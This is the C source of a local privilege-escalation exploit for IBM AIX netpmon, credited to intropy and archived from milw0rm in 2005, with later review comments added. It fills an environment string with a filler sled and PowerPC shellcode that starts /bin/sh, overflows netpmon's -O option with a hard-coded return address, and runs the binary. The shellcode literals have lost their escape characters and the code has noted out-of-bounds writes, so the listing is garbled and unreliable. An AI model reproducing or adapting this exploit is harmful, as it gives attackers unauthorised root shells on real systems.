/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
/* Build-time settings for this proof-of-concept. */
/* Non-zero enables the progress printf() calls in cex_load_environment(). */
#define DEBUG 1
/* Bytes main() allocates for the string passed as the value of netpmon's -O option. */
#define BUFFERSIZE 2048
/* Bytes main() allocates for the single environment string handed to execve(). */
#define EGGSIZE 2048
/* Filler byte written ahead of the payload in the environment string (the author calls it NOP). */
#define NOP 0x60
/*
 * Hard-coded address that cex_load_environment() repeats across the -O argument.
 * Presumably a stack location observed on the AIX 5.2 system named in the file
 * header; nothing here computes it at run time, so the code depends on a fixed,
 * predictable address in the target process.
 * NOTE(review): the expansion is not parenthesised; its only use in this file is
 * a plain assignment.
 */
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/*
 * Payload string placed in the environment by cex_load_environment().
 * The per-line comments are the author's own PowerPC disassembly; they end in
 * `svca` (supervisor call) and the string carries the path "/bin/sh", so the
 * intent is presumably to start a shell in the context of the target process.
 *
 * NOTE(review): as rendered on this page the literals contain no escape
 * backslashes, so they are plain ASCII text such as "x7cxa5x2ax79" rather than
 * the instruction bytes the comments describe. Treat this listing as an
 * archival description of the technique, not as the original byte sequence.
 *
 * Defensive relevance: an environment string of roughly 2 KB made of a repeated
 * filler byte followed by "/bin/sh", handed to a privileged binary, is the
 * artefact process-execution auditing would see.
 */
char shellcode_binsh[] =
"x7cxa5x2ax79" /* xor. r5,r5,r5 */
"x40x82xffxfd" /* bnel <shellcode> */
"x7fxe8x02xa6" /* mflr r31 */
"x3bxffx01x20" /* cal r31,0x120(r31) */
"x38x7fxffx08" /* cal r3,-248(r31) */
"x38x9fxffx10" /* cal r4,-240(r31) */
"x90x7fxffx10" /* st r3,-240(r31) */
"x90xbfxffx14" /* st r5,-236(r31) */
"x88x5fxffx0f" /* lbz r2,-241(r31) */
"x98xbfxffx0f" /* stb r5,-241(r31) */
"x4cxc6x33x42" /* crorc cr6,cr6,cr6 */
"x44xffxffx02" /* svca */
"/bin/sh"
"x05";
/*
 * Fill the two caller-supplied buffers used for the netpmon invocation:
 * an environment string (filler bytes followed by the payload) and an
 * argument string (a repeated hard-coded address).
 *
 * env_buffer       destination for the environment string
 * address_buffer   destination for the argument string
 * payload          NUL-terminated payload copied after the filler
 * environment_size filler length requested by the caller (main passes EGGSIZE)
 * buffer_size      length of address_buffer (main passes BUFFERSIZE)
 *
 * Always returns 0; no error is reported and neither buffer length is checked.
 *
 * NOTE(review): several writes below fall outside the sizes main() allocates,
 * so the function has undefined behaviour as written. The format strings end
 * in a literal 'n' and the two terminator assignments store ' '; both look
 * like escape sequences lost when the page was extracted -- confirm against
 * an authoritative copy before relying on the exact bytes.
 */
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
/* env_size = payload length + requested filler + 4 (length of "CAU=") + 1. */
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
/*
 * Writes environment_size + 4 filler bytes, advancing env_buffer itself.
 * With main()'s arguments that is 4 bytes more than the EGGSIZE allocation.
 */
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
/* Payload is appended after the filler, still through the advanced pointer. */
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...n", count);
/*
 * env_buffer now points past the payload, so this index and the memcpy below
 * are relative to that position, not to the start of the caller's buffer:
 * the "CAU=" name is written after the payload rather than in front of it.
 */
env_buffer[env_size - 1] = ' ';
memcpy(env_buffer, "CAU=", 4);
/* Pre-fill the argument string with 'A' before laying the address over it. */
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lxn", address);
if (DEBUG) printf("Adding return address to buffer...");
/*
 * Stores start at byte offset 3, i.e. through an unaligned unsigned long
 * pointer, and buffer_size / 4 stores are made, so the last store ends
 * beyond address_buffer + buffer_size.
 */
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...n", count);
address_buffer[buffer_size - 1] = ' ';
return( 0 );
}
/*
 * Build the argument and environment vectors and replace this process with
 * /usr/bin/netpmon, passing the crafted string as the value of -O.
 *
 * What a defender would observe: an execve() of /usr/bin/netpmon by an
 * unprivileged user with a -O argument of about BUFFERSIZE bytes and an
 * environment holding a single string of about EGGSIZE bytes. The file header
 * describes the result as elevated privileges, which presumably means netpmon
 * runs with more privilege than the caller (for example as a set-uid
 * program) -- verify on the system in question. Relevant mitigations are the
 * vendor fix for netpmon's option handling (advisory id not given on this
 * page) and restricting who may execute the binary where it is not needed.
 *
 * NOTE(review): both malloc() results are used unchecked, args is declared
 * with three elements while index 3 is assigned, and a failed execve() falls
 * through to return 0 without any diagnostic.
 */
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
/* buffer becomes the -O value, egg the only environment string. */
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/netpmon";
args[1] = "-O";
args[2] = buffer;
args[3] = NULL;
/* The caller's own environment is discarded; only egg is passed on. */
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/netpmon", args, envs );
/* Reached only if execve() failed. */
return( 0 );
}
// milw0rm.com [2005-06-14]